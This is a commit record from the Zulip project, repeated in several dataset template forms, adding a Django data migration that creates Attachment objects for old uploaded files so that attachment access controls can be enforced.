metry/zulip
|
Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
<commit_before><commit_msg>Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
<commit_before><commit_msg>Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
|
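A note on the record above: the migration follows the standard RunPython data-migration shape, resolve historical models via apps.get_model, mutate rows, and register the function in operations. A generic skeleton of that shape (app, model, and field names are invented, not Zulip's):
from django.db import migrations

def forwards(apps, schema_editor):
    MyModel = apps.get_model('myapp', 'MyModel')  # historical model state, not the live class
    for obj in MyModel.objects.filter(needs_fix=True):
        obj.fixed = True
        obj.save()

class Migration(migrations.Migration):
    dependencies = [('myapp', '0001_initial')]
    operations = [migrations.RunPython(forwards)]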
1f83170b2e97d8c8a20acdd20109e460b73a09dc
|
multiples-of-3-and-5/index.py
|
multiples-of-3-and-5/index.py
|
from __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
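A quick sanity check of the inclusion-exclusion implementation above, assuming the two functions are in scope (the expected value is the classic Project Euler #1 answer):
print(getSumOfMultiples([3, 5], 1000))  # -> 233168 (166833 + 99500 - 33165)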
Add optimized multiples-of-3-and-5 in Python
|
Add optimized multiples-of-3-and-5 in Python
|
Python
|
mit
|
SterlingVix/code-problems,nickell-andrew/code-problems,jefimenko/code-problems,SterlingVix/code-problems,netuoso/code-problems,ockang/code-problems,jmera/code-problems,ranveer-git/code-problems,SterlingVix/code-problems,angelkar/code-problems,ockang/code-problems,marcoviappiani/code-problems,sisirkoppaka/code-problems,jefimenko/code-problems,cjjavellana/code-problems,sethdame/code-problems,marcoviappiani/code-problems,akaragkiozidis/code-problems,akaragkiozidis/code-problems,ankur-anand/code-problems,faruzzy/code-problems,saurabhjn76/code-problems,akaragkiozidis/code-problems,modulexcite/code-problems,diversedition/code-problems,jefimenko/code-problems,ranveer-git/code-problems,blakeembrey/code-problems,aloisdg/code-problems,blakeembrey/code-problems,jefimenko/code-problems,netuoso/code-problems,nickell-andrew/code-problems,Widea/code-problems,akaragkiozidis/code-problems,Widea/code-problems,blakeembrey/code-problems,AndrewKishino/code-problems,sethdame/code-problems,tahoeRobbo/code-problems,ankur-anand/code-problems,tahoeRobbo/code-problems,patrickford/code-problems,lgulliver/code-problems,hlan2/code-problems,rkho/code-problems,modulexcite/code-problems,caoglish/code-problems,caoglish/code-problems,akaragkiozidis/code-problems,diversedition/code-problems,faruzzy/code-problems,sethdame/code-problems,caoglish/code-problems,modulexcite/code-problems,cjjavellana/code-problems,aloisdg/code-problems,akaragkiozidis/code-problems,marcoviappiani/code-problems,ockang/code-problems,Widea/code-problems,SterlingVix/code-problems,blakeembrey/code-problems,netuoso/code-problems,ranveer-git/code-problems,Widea/code-problems,saurabhjn76/code-problems,ankur-anand/code-problems,sisirkoppaka/code-problems,aloisdg/code-problems,faruzzy/code-problems,angelkar/code-problems,nacho-gil/code-problems,AndrewKishino/code-problems,netuoso/code-problems,nacho-gil/code-problems,aloisdg/code-problems,hlan2/code-problems,patrickford/code-problems,hlan2/code-problems,tahoeRobbo/code-problems,hlan2/code-problems,hlan2/code-problems,dwatson3/code-problems,blakeembrey/code-problems,modulexcite/code-problems,dwatson3/code-problems,dwatson3/code-problems,cjjavellana/code-problems,lgulliver/code-problems,sisirkoppaka/code-problems,jefimenko/code-problems,jmera/code-problems,rkho/code-problems,jmera/code-problems,faruzzy/code-problems,akaragkiozidis/code-problems,lgulliver/code-problems,marcoviappiani/code-problems,ranveer-git/code-problems,hlan2/code-problems,tahoeRobbo/code-problems,tahoeRobbo/code-problems,saurabhjn76/code-problems,marcoviappiani/code-problems,nacho-gil/code-problems,caoglish/code-problems,SterlingVix/code-problems,marcoviappiani/code-problems,ranveer-git/code-problems,diversedition/code-problems,ockang/code-problems,dwatson3/code-problems,patrickford/code-problems,rkho/code-problems,aloisdg/code-problems,modulexcite/code-problems,jmera/code-problems,rkho/code-problems,sethdame/code-problems,rkho/code-problems,SterlingVix/code-problems,cjjavellana/code-problems,ankur-anand/code-problems,hlan2/code-problems,marcoviappiani/code-problems,saurabhjn76/code-problems,faruzzy/code-problems,jefimenko/code-problems,dwatson3/code-problems,saurabhjn76/code-problems,BastinRobin/code-problems,AndrewKishino/code-problems,marcoviappiani/code-problems,ankur-anand/code-problems,dwatson3/code-problems,modulexcite/code-problems,aloisdg/code-problems,hlan2/code-problems,angelkar/code-problems,caoglish/code-problems,lgulliver/code-problems,sethdame/code-problems,sisirkoppaka/code-problems,angelkar/code-problems,faruzzy/code-problems,angelkar/code-problems,nickell-andrew/code-problems,sisirkoppaka/code-problems,sethdame/code-problems,lgulliver/code-problems,ockang/code-problems,sisirkoppaka/code-problems,patrickford/code-problems,jefimenko/code-problems,nacho-gil/code-problems,caoglish/code-problems,lgulliver/code-problems,jmera/code-problems,AndrewKishino/code-problems,faruzzy/code-problems,AndrewKishino/code-problems,ranveer-git/code-problems,netuoso/code-problems,BastinRobin/code-problems,diversedition/code-problems,rkho/code-problems,rkho/code-problems,hlan2/code-problems,patrickford/code-problems,saurabhjn76/code-problems,nacho-gil/code-problems,dwatson3/code-problems,jefimenko/code-problems,ranveer-git/code-problems,jmera/code-problems,tahoeRobbo/code-problems,nacho-gil/code-problems,ankur-anand/code-problems,angelkar/code-problems,nickell-andrew/code-problems,patrickford/code-problems,SterlingVix/code-problems,aloisdg/code-problems,patrickford/code-problems,modulexcite/code-problems,AndrewKishino/code-problems,rkho/code-problems,lgulliver/code-problems,tahoeRobbo/code-problems,sisirkoppaka/code-problems,BastinRobin/code-problems,tahoeRobbo/code-problems,jmera/code-problems,SterlingVix/code-problems,jefimenko/code-problems,jmera/code-problems,nacho-gil/code-problems,aloisdg/code-problems,Widea/code-problems,BastinRobin/code-problems,angelkar/code-problems,Widea/code-problems,SterlingVix/code-problems,jefimenko/code-problems,ankur-anand/code-problems,modulexcite/code-problems,dwatson3/code-problems,angelkar/code-problems,aloisdg/code-problems,ranveer-git/code-problems,blakeembrey/code-problems,Widea/code-problems,faruzzy/code-problems,angelkar/code-problems,netuoso/code-problems,sethdame/code-problems,modulexcite/code-problems,ranveer-git/code-problems,diversedition/code-problems,netuoso/code-problems,cjjavellana/code-problems,faruzzy/code-problems,tahoeRobbo/code-problems,aloisdg/code-problems,AndrewKishino/code-problems,nickell-andrew/code-problems,ankur-anand/code-problems,marcoviappiani/code-problems,cjjavellana/code-problems,nickell-andrew/code-problems,ockang/code-problems,AndrewKishino/code-problems,saurabhjn76/code-problems,cjjavellana/code-problems,saurabhjn76/code-problems,nacho-gil/code-problems,blakeembrey/code-problems,diversedition/code-problems,nacho-gil/code-problems,faruzzy/code-problems,Widea/code-problems,saurabhjn76/code-problems,patrickford/code-problems,BastinRobin/code-problems,diversedition/code-problems,Widea/code-problems,lgulliver/code-problems,angelkar/code-problems,diversedition/code-problems,lgulliver/code-problems,jmera/code-problems,nickell-andrew/code-problems,ankur-anand/code-problems,nickell-andrew/code-problems,cjjavellana/code-problems,dwatson3/code-problems,AndrewKishino/code-problems,sisirkoppaka/code-problems,sisirkoppaka/code-problems,hlan2/code-problems,netuoso/code-problems,akaragkiozidis/code-problems,rkho/code-problems,jmera/code-problems,sethdame/code-problems,BastinRobin/code-problems,caoglish/code-problems,caoglish/code-problems,blakeembrey/code-problems,akaragkiozidis/code-problems,nickell-andrew/code-problems,sethdame/code-problems,Widea/code-problems,patrickford/code-problems,cjjavellana/code-problems,ockang/code-problems,ranveer-git/code-problems,cjjavellana/code-problems,rkh
o/code-problems,modulexcite/code-problems,caoglish/code-problems,blakeembrey/code-problems,diversedition/code-problems,marcoviappiani/code-problems,blakeembrey/code-problems,sethdame/code-problems,BastinRobin/code-problems,SterlingVix/code-problems,ockang/code-problems,ankur-anand/code-problems,lgulliver/code-problems,BastinRobin/code-problems,akaragkiozidis/code-problems,nickell-andrew/code-problems
|
Add optimized multiples-of-3-and-5 in Python
|
from __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
from functools import reduce  # needed on Python 3; also available on Python 2.6+
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
<commit_before><commit_msg>Add optimized multiples-of-3-and-5 in Python<commit_after>
|
from __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
from functools import reduce  # needed on Python 3; also available on Python 2.6+
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
Add optimized multiples-of-3-and-5 in Pythonfrom __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
from functools import reduce  # needed on Python 3; also available on Python 2.6+
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
<commit_before><commit_msg>Add optimized multiples-of-3-and-5 in Python<commit_after>from __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
from functools import reduce  # needed on Python 3; also available on Python 2.6+
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
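A quick hedged sanity check for the inclusion-exclusion sum above is to compare it against a brute-force loop; this snippet is illustrative and not part of the commit.
# Illustrative check, not part of the commit above.
def brute_force(multiples, limit):
    # Sum every n below `limit` divisible by at least one of the multiples.
    return sum(n for n in range(limit) if any(n % m == 0 for m in multiples))
# Expected agreement (Project Euler #1): both give 233168 for [3, 5] below 1000.
# getSumOfMultiples([3, 5], 1000) == brute_force([3, 5], 1000) == 233168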
|
|
fb222d4e7a3ff33ac3f3e84e655f303b4d961246
|
support/jenkins/buildAllModulesWithErrors.py
|
support/jenkins/buildAllModulesWithErrors.py
|
import os
from subprocess import call
# To be called from the build folder in the OpenSpace repository
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-DOPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
Add python script to build all modules with warnings as errors
|
Add python script to build all modules with warnings as errors
|
Python
|
mit
|
OpenSpace/OpenSpace,OpenSpace/OpenSpace,OpenSpace/OpenSpace,OpenSpace/OpenSpace
|
Add python script to build all modules with warnings as errors
|
import os
from subprocess import call
# To be called from the build folder in the OpenSpace repository
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-DOPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
<commit_before><commit_msg>Add python script to build all modules with warnings as errors<commit_after>
|
import os
from subprocess import call
# To be called from the build folder in the OpenSpace repository
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-DOPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
Add python script to build all modules with warnings as errorsimport os
from subprocess import call
# To be called from the build folder in the OpenSpace repository
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-DOPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
|
<commit_before><commit_msg>Add python script to build all modules with warnings as errors<commit_after>import os
from subprocess import call
# To be called from the build folder in the OpenSpace repository
modules = os.listdir("../modules")
cmd = ["cmake"]
cmd.append("-DGHOUL_USE_DEVIL=OFF")
cmd.append("-DOPENSPACE_WARNINGS_AS_ERRORS=ON")
for m in modules:
cmd.append("-DOPENSPACE_MODULE_" + m.upper() + "=ON")
cmd.append("..")
call(cmd)
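One hedged refinement of the script above: support a dry run that prints the assembled command instead of invoking cmake. The --dry-run flag is an invented addition for illustration, not part of the original commit.
# Illustrative extension of the script above; --dry-run is an invented flag.
import sys
if "--dry-run" in sys.argv:
    print(" ".join(cmd))
else:
    call(cmd)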
|
|
e7cf300f1a9e878c7a34a719442c71128892b9f3
|
server/xml_server.py
|
server/xml_server.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
Add initial implementation of XMLServer
|
Add initial implementation of XMLServer
|
Python
|
apache-2.0
|
Solucionamos/dummybmc
|
Add initial implementation of XMLServer
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
<commit_before><commit_msg>Add initial implementation of XMLServer<commit_after>
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
Add initial implementation of XMLServer#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
|
<commit_before><commit_msg>Add initial implementation of XMLServer<commit_after>#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2014 gm <gm@PONTADATELHA>
#
# Distributed under terms of the MIT license.
"""
"""
import sys
from server import Server
class XMLServer(Server):
def getTemperatures(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getTemperatures(self)))
def getFans(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getFans(self)))
def getVoltages(self):
return reduce(lambda x,y: x+y, map(lambda sensor: ['<sensor>'] +
['<%s>%s</%s>' % (field,value,field) for field, value in
sensor.iteritems()] + ['</sensor>'], Server.getVoltages(self)))
def get(self, field):
xmldata = []
xmldata.append('<root>')
xmldata.append('<thresholdSensorList>')
if field == 'temperatures':
xmldata.extend(self.getTemperatures())
elif field == 'fans':
xmldata.extend(self.getFans())
elif field == 'voltages':
xmldata.extend(self.getVoltages())
else:
raise Exception('Field not implemented: ' + field)
xmldata.append('</thresholdSensorList>')
xmldata.append('<status>ok</status>')
xmldata.append('</root>')
return '\n'.join(xmldata)
if __name__ == '__main__':
server = XMLServer(sys.argv[1])
print server.get('temperatures')
print server.get('fans')
print server.get('voltages')
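The getters above build XML by string concatenation under Python 2; a minimal Python 3 sketch of the same idea using the standard library's xml.etree (an assumption about how one might modernize it, not what the commit does) would be:
# Hypothetical Python 3 rewrite of one getter; not part of the commit.
import xml.etree.ElementTree as ET
def sensors_to_xml(sensors):
    root = ET.Element("thresholdSensorList")
    for sensor in sensors:
        node = ET.SubElement(root, "sensor")
        for field, value in sensor.items():
            ET.SubElement(node, field).text = str(value)
    return ET.tostring(root, encoding="unicode")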
|
|
c0d38e490d6503209e08b1b5906b579339088714
|
data2sql/data2sql.py
|
data2sql/data2sql.py
|
# -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
Add script to convert data into sql
|
Add script to convert data into sql
|
Python
|
bsd-2-clause
|
rongxinyin/pge-adr,rongxinyin/pge-adr
|
Add script to convert data into sql
|
# -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
<commit_before><commit_msg>Add script to convert data into sql<commit_after>
|
# -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
Add script to convert data into sql# -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
<commit_before><commit_msg>Add script to convert data into sql<commit_after># -*- coding: utf-8 -*-
"""
Rongxin Yin, 11/2/2016
"""
import pandas as pd
import seaborn as sns
a = [1,2,3]
df = pd.DataFrame(a,['a','b','c'])
print("Done")
|
|
b354166b9d244b1b4a1092c2a77cb45f84bdea1d
|
leetcode/challenge/day01.py
|
leetcode/challenge/day01.py
|
"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
from typing import List
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
Add day1 of the leetcode challenge
|
Add day1 of the leetcode challenge
|
Python
|
mit
|
lemming52/white_pawn,lemming52/white_pawn
|
Add day1 of the leetcode challenge
|
"""
Given a non-empty array of integers, every element appears twice except for one. Find that single one.
Note:
Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
"""
from typing import List
class Solution:
def singleNumber(self, nums: List[int]) -> int:
for i in range(1, len(nums)):
nums[0] = nums[0] ^ nums[i]
return nums[0]
|
<commit_before><commit_msg>Add day1 of the leetcode challenge<commit_after>
|
"""
